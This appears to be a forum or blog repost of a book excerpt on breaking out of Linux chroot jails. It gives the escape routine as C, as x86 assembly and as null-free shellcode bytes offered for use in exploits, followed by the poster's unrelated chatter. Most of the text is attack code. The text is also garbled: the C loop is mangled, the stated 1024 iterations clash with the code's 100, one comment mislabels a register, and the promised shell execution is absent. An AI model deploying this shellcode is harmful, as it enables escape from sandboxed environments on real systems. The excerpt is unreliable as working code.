Assembly and Shellcode | |
Writing Security Tools and Exploits | |
Syngress Publishing © 2006 |
A snippet from the book
The following technique will break out of chroot jails on new Linux kernels with ease. This technique works by first creating a directory inside the chroot jail. After this directory is created, we chroot that particular directory. We then iterate 1024 times, attempting to change to the directory ../. For every iteration, we perform a stat() on the current ./ directory and if that directory has the inode of 2, we chroot to directory ./ one more time and then execute the shell. In C, the code looks like the following:
1 int main(void)
2 {
3 int i;
4 struct stat sb;
5
6 mkdir("A", 0755);
7 chroot("A");
8
9 for(i = 0; i < st_ino ="=">Converted to Assembly, the code looks like this:
1 .globl main
2
3 main:
4 xorl %edx, %edx
5
6 pushl %edx
7 pushl $0x2e2e2e2e
8
9 movl %esp, %ebx
10 movw $0x01ed, %cx
11
12 leal 0x27(%edx), %eax
13 int $0x80
14
15 leal 61(%edx), %eax
16 int $0x80
17
18 xorl %esi, %esi
19
20 loop:
21 pushl %edx
22 pushw $0x2e2e
23 movl %esp, %ebx
24
25 leal 12(%edx), %eax
26 int $0x80
27
28 pushl %edx
29 push $0x2e
30 movl %esp, %ebx
31
32 subl $88, %esp
33 movl %esp, %ecx
34
35 leal 106(%edx), %eax
36 int $0x80
37
38 movl 0x4(%ecx), %edi
39 cmpl $0x2, %edi
40 je hacked
41
42 incl %esi
43 cmpl $0x64, %esi
44 jl loop
45
46 hacked:
47 pushl %edx
48 push $0x2e
49 movl %esp, %ebx
50
51 leal 61(%edx), %eax
52 int $0x80Lastly, converted to bytecode and ready for use in an exploit, the code looks like the following:
1 const char neo_chroot[] =
2 "\ x31\ xd2" /* xorl %edx, %edx */
3 "\ x52" /* pushl %edx */
4 "\ x68\ x2e\ x2e\ x2e\ x2e" /* pushl $0x2e2e2e2e */
5 "\ x89\ xe3" /* movl %esp, %ebx */
6 "\ x66\ xb9\ xed\ x01" /* movw $0x1ed, %cx */
7 "\ x8d\ x42\ x27" /* leal 0x27(%edx), %eax */
8 "\ xcd\ x80" /* int $0x80 */
9 "\ x8d\ x42\ x3d" /* leal 0x3d(%edx), %eax */
10 "\ xcd\ x80" /* int $0x80 */
11 "\ x31\ xf6" /* xorl %esi, %esi */
12 "\ x52" /* pushl %edx */
13 "\ x66\ x68\ x2e\ x2e" /* pushw $0x2e2e */
14 "\ x89\ xe3" /* movl %esp, %ebx */
15 "\ x8d\ x42\ x0c" /* leal 0xc(%edx), %eax */
16 "\ xcd\ x80" /* int $0x80 */
17 "\ x52" /* pushl %edx */
18 "\ x6a\ x2e" /* push $0x2e */
19 "\ x89\ xe3" /* movl %esp, %ebx */
20 "\ x83\ xec\ x58" /* subl $0x58, %ecx */
21 "\ x89\ xe1" /* movl %esp, %ecx */
22 "\ x8d\ x42\ x6a" /* leal 0x6a(%edx), %eax */
23 "\ xcd\ x80" /* int $0x80 */
24 "\ x8b\ x79\ x04" /* movl 0x4(%ecx), %edi */
25 "\ x83\ xff\ x02" /* cmpl $0x2, %edi */
26 "\ x74\ x06" /* je*/
27 "\ x46" /* incl %esi */
28 "\ x83\ xfe\ x64" /* cmpl $0x64, %esi */
29 "\ x7c\ xd7" /* jl*/
30 "\ x52" /* pushl %edx */
31 "\ x6a\ x2e" /* push $0x2e */
32 "\ x89\ xe3" /* movl %esp, %ebx */
33 "\ x8d\ x42\ x3d" /* leal 0x3d(%edx), %eax */
34 "\ xcd\ x80"; /* int $0x80 */This is the chroot breaking code converted from C to Assembly to bytecode.
When written in Assembly, careful attention was paid to assure that no opcodes
that use Null bytes were called and that the size was kept down to a minimum.
P/S: ANYMASTER OR GURU OUT THERE, I NEED TO TALK TO YOU WANNA ASK U SOMETHING
P/S2: I read this book ~wink and grow rich: one man ask a successfull dentist
that man ask the dentist "hello sir, how u had this success with you and i
saw u really had a good life, how did u make it", then the dentist answer
"it's simple, by become better dentist !"..............:wink